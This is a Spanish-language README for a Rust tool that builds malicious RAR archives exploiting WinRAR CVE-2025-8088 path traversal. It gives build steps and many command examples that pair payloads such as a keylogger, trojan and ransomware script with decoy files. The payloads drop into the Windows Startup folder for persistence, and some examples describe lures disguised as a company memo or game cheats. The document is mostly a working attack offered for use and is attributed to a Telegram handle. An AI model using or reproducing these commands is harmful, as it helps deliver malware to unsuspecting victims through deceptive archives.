
Una implementación de alto rendimiento y segura en cuanto a memoria de la herramienta de explotación WinRAR CVE-2025-8088, reescrita en Rust para una mejor fiabilidad y rendimiento.
Herramienta avanzada de explotación de Path Traversal en WinRAR - Escrita en Rust
Una implementación de alto rendimiento y segura en memoria de la herramienta de explotación WinRAR CVE-2025-8088, reescrita en Rust para mayor confiabilidad y rendimiento.
# Instalar Rust usando rustup
# Verificar la instalación
rustc --version
cargo --version
# Usando vcpkg
vcpkg install gtk:x64-windows
pacman -S mingw-w64-x86_64-gtk4
# Navegar al proyecto Rust
cd winrar_exploit_rust
# Compilar en modo debug
cargo build
# Compilar versión optimizada
cargo build --release
# Ejecutar la aplicación
cargo run --release
Crear una explotación simple con una carga útil y un archivo señuelo:
# Crear explotación con carga útil ejecutable
.\winrar_exploit_rust.exe create --payload "C:\payload.exe" --decoy "C:\decoy.txt" --output "exploit.rar"
# Crear explotación con carga útil de script
.\winrar_exploit_rust.exe create --payload "C:\malicious.ps1" --decoy "C:\document.pdf" --output "malicious.rar"
# Usar varios archivos señuelo separados por comas
.\winrar_exploit_rust.exe create --payload "C:\payload.exe" --decoy "C:\photo.jpg,C:\document.pdf,C:\video.mp4" --output "multi_decoy.rar"
# Especificar directorio personalizado donde se colocará la carga útil
.\winrar_exploit_rust.exe create --payload "C:\payload.exe" --decoy "C:\decoy.txt" --output "custom_drop.rar" --drop_dir "C:\Users\Victim\Desktop"
# Carga útil de imagen (esteganografía)
.\winrar_exploit_rust.exe create --payload "C:\malicious.jpg" --decoy "C:\innocent.txt" --output "image_exploit.rar"
# Carga útil PDF
.\winrar_exploit_rust.exe create --payload "C:\trojan.pdf" --decoy "C:\readme.txt" --output "pdf_exploit.rar"
# Carga útil de script batch
.\winrar_exploit_rust.exe create --payload "C:\ransomware.bat" --decoy "C:\instructions.txt" --output "batch_exploit.rar"
# Ejecutar diagnóstico del sistema para verificar compatibilidad
.\winrar_exploit_rust.exe diagnose
# Mostrar herramientas y características disponibles
.\winrar_exploit_rust.exe tools
# Crear un documento malicioso que parezca un memo de la empresa
.\winrar_exploit_rust.exe create --payload "C:\keylogger.exe" --decoy "C:\company_memo.pdf" --output "important_memo.rar"
# Ocultar malware en un archivo de trucos de juego
.\winrar_exploit_rust.exe create --payload "C:\trojan.exe" --decoy "C:\game_cheat.txt,C:\screenshot.jpg" --output "cheats.rar"
La herramienta crea archivos RAR con path traversal utilizando:
Ejemplo de ruta: ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\payload.exe
winrar_exploit_rust/
├── src/
│ ├── main.rs # Punto de entrada de la aplicación
│ ├── gui.rs # Interfaz de usuario basada en GTK
│ ├── exploit.rs # Lógica principal de explotación
│ ├── ads.rs # Manipulación de ADS NTFS
│ ├── rar.rs # Manipulación de cabeceras RAR5
│ ├── diagnostics.rs # Diagnóstico del sistema
│ └── error.rs # Manejo de errores
├── Cargo.toml # Dependencias y configuración de compilación
└── README.md # Este archivo
La herramienta incluye diagnósticos automáticos que verifican:
"GTK no encontrado"
# Instalar bibliotecas de desarrollo GTK
# Windows (vcpkg)
vcpkg install gtk:x64-windows
# O usando MSYS2
pacman -S mingw-w64-x86_64-gtk4
"CLI de WinRAR no encontrado"
rar.exe esté en Archivos de Programa"No se puede escribir en el directorio de inicio"
"ADS NTFS no soportado"
Errores de compilación
# Actualizar la cadena de herramientas Rust
rustup update
# Limpiar y recompilar
cargo clean
cargo build --release
# Formatear código
cargo fmt
# Verificar código con linter
cargo clippy
Las dependencias clave incluyen:
gtk - Marco de trabajo moderno para GUItokio - Entorno de ejecución asíncronowindows - Enlaces de API de Windowscrc32fast - Cálculo rápido de CRC32byteorder - Manipulación de orden de bytesanyhow - Manejo de erroresEste proyecto está bajo la Licencia MIT; consulte el archivo LICENSE para más detalles.
Creado por @kanonufo en Telegram
Herramienta de equipo rojo de alto rendimiento para la explotación de CVE-2025-8088 - Rust Edition